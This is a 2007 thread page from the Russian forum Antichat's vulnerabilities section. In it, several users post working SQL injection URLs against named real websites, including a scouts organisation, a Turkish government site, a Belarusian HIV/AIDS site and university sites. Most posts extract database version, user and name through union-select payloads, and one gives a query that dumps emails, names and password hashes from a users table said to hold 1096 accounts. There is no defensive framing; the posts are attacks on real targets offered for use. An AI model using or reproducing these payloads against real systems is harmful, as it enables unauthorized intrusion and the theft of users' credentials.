ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2271  
Старый 25.05.2007, 09:36
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

Жертва: www.scouts.ru(Центральный Сервер
Скаутов-разведчиков)

SQL:
PHP код:
http://www.scouts.ru/modules/events/event.php?id=47999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
version(): 5.0.26-standard
user(): orur@localhost
database() :xoops

Таблиц: 589
PHP код:
http://www.scouts.ru/modules/events/event.php?id=479999999999+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables+limit+589,1-- 
Основные:xoops_users

Количество юзеров:1096
Извлечение:
Mail: name: pass(хеш).

PHP код:
http://www.scouts.ru/modules/events/event.php?id=479999999999+union+select+1,2,3,4,5,concat_ws(char(58),email,name,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+xoops_users+limit+1096,1-- 

Последний раз редактировалось V.I.P; 25.05.2007 в 10:33..
 
Ответить с цитированием

  #2272  
Старый 25.05.2007, 12:32
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

www.atam.gov.tr
PHP код:
_http://www.atam.gov.tr/index.php?Page=DergiIcerik&IcerikNo=-1+union+select+1,version(),3,4,user()/* 
Таблица: DergiIcerik
Поля: No,TRBaslik,TRYazar,TRDergiSayi,TRIcerik

P.S. Есть там ещё таблицы?
 
Ответить с цитированием

  #2273  
Старый 25.05.2007, 12:43
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

сдесь был байан!
domainsdb! привет, lol nax (кто смотрел видео)
Код:
http://www.mconline.ru/common/rateit/opinion_new.asp?code_opinion=ORT116046'--&code_rate=RRT175481
похоже mconline в одной базе с хакерру =)
//ps
Код:
http://www.xakep.ru/magazine/xA/088/056/2.asp
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

Последний раз редактировалось zl0ba; 25.05.2007 в 17:45.. Причина: не стал удалять, проверяем антибаяном http://hlamidnik.h18.ru/SQLS.html
 
Ответить с цитированием

  #2274  
Старый 25.05.2007, 12:47
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Белорусский интерактивный веб-сайт для молодежи по проблеме ВИЧ/СПИД
Цитата:
http://www.aids.by/news_det.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x 3a,database()),4,5,6,7/*
 
Ответить с цитированием

  #2275  
Старый 25.05.2007, 13:37
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Сайт о КПК, ноутбуках и мобилах
Цитата:
http://www.pda.by/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(version(),0x3a,database(),0x3a,user())/*
 
Ответить с цитированием

  #2276  
Старый 25.05.2007, 17:37
MrSmith
Новичок
Регистрация: 23.05.2007
Сообщений: 1
Провел на форуме:
17164

Репутация: 0
Отправить сообщение для MrSmith с помощью ICQ
По умолчанию

Я тоже попробую: _http://collectablekids.com.au/shop/products/index.php?id=9999999999999'+union+select+1,2,3,4,v ersion(),6,7,8,9/*
 
Ответить с цитированием

  #2277  
Старый 25.05.2007, 17:55
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

.edu
Код:
http://www.gse.upenn.edu/cms/cms.php?id=-263+union+select+1,2,3,4,version(),6/*
http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Остальное:
Код:
http://www.dec-edu.com/detail_news.php?news=-33+union+select+version()/* (см. заголовок страницы)
http://www.rdu.org.ua/news.php?path=arc&subpath=main&content=-1044981924+union+select+1,version(),3,4/*
Не смог подобрать столбцы:
Код:
http://www.intergu.ru/pedsov/index.asp?main=answer&id_sec=-60+union+select+1,2/*
http://ruspoisk.ru/?type=7&s=54&city=-337+union+select+1,2,3,4,5,6,7,8,9/*
http://www.networkdoc.ru/news/news.php?id=-342+union+select+1/*
http://www.mpn.ru/my_news.php?number=8&id=-1+union+select+1,2,3/*
http://www.pskovedu.ru/?session=&project_id=-93+union+select+1,2,3/*
На этот раз всё проверил
 
Ответить с цитированием

  #2278  
Старый 25.05.2007, 18:10
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Информационный свадебный центр
Цитата:
http://www.swadba.by/show.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12,13,14/*
 
Ответить с цитированием

  #2279  
Старый 25.05.2007, 19:06
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://legalru.ru/document.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5/*
 
Ответить с цитированием

  #2280  
Старый 25.05.2007, 19:22
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Антиимпериализм))
Код:
http://www.anti-imperialism.net/lai/texte.php?langue=3&section=BY&id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8/*

Последний раз редактировалось _Pantera_; 26.05.2007 в 00:35..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ